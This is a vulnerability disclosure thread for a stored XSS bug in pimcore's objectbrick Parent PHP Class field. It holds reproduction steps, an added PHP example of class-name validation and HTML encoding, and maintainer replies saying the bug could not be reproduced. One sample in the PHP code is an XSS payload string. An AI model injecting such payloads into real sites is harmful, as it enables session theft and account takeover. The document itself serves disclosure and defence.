Cross-site Scripting (XSS) - Stored in pimcore/pimcore
Valid
Reported on Nov 21st 2021
Description
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
Steps to reproduce:
1. Go to Settings --> Data Objects --> Objectbricks.
2. Click Add, or edit an existing objectbrick.
3. In the Parent PHP Class input, enter any payload.
4. Click Save to get the alert.
POST Request Example:
https://10.x-dev.pimcore.fun/admin/class/objectbrick-update
Impact
This vulnerability could be used to steal a user's session, take over a user account, or redirect a user to an attacker-controlled site.
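The report hinges on the Parent PHP Class field accepting arbitrary text that is later rendered in the admin UI. Below is an added example (not pimcore's own code) of the two controls a save handler for such a field needs: reject anything that is not a syntactically valid PHP class name before it is stored, and HTML-encode the value when it is rendered. The function names and sample values are constructed for this illustration.

```php
<?php
declare(strict_types=1);

// A PHP class name (optionally fully qualified) only ever consists of
// backslash-separated identifiers: letters, digits and underscores.
// Quotes, angle brackets and spaces can never appear, so the whitelist
// rejects the payload shape from this report before it reaches storage.
function isValidPhpClassName(string $value): bool
{
    // The field is optional in the objectbrick form, so empty is fine.
    if ($value === '') {
        return true;
    }
    $identifier = '[A-Za-z_][A-Za-z0-9_]*';
    $pattern = '/^\\\\?' . $identifier . '(\\\\' . $identifier . ')*$/';
    return preg_match($pattern, $value) === 1;
}

// Defence in depth: whatever is stored is still encoded on output, so a
// value that slipped past validation cannot break out of an attribute.
function renderAttribute(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed samples: two legitimate parent classes and the malformed
// value shape used in the report above.
$samples = [
    '\\App\\Model\\Car',
    'Pimcore\\Model\\DataObject\\Objectbrick\\Data\\AbstractData',
    'xss"><img src=x onerror=alert(5)>',
];

foreach ($samples as $sample) {
    $verdict = isValidPhpClassName($sample) ? 'ACCEPTED' : 'REJECTED';
    // Even the rejected value is printed through the encoder.
    echo $verdict . ': ' . renderAttribute($sample) . PHP_EOL;
}
```

Running the script accepts the first two samples and rejects the third; the echoed rejected value appears with `&quot;`, `&lt;` and `&gt;` in place of the raw characters.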
We are processing your report and will contact the pimcore team within 24 hours.
2 years ago
We have contacted a member of the pimcore team and are waiting to hear back.
2 years ago
Hi,
Could not reproduce the issue as the Parent Class value is validated in the save handler of Objectbricks Definition here.
thanks, Divesh
I'm sure this is reproducible; you can just follow my steps to get the alert.
Best,
We have sent a follow up to the pimcore team. We will try again in 7 days.
2 years ago
Could you please share the payload that you are using?
thanks, Divesh
We have sent a second follow up to the pimcore team. We will try again in 10 days.
2 years ago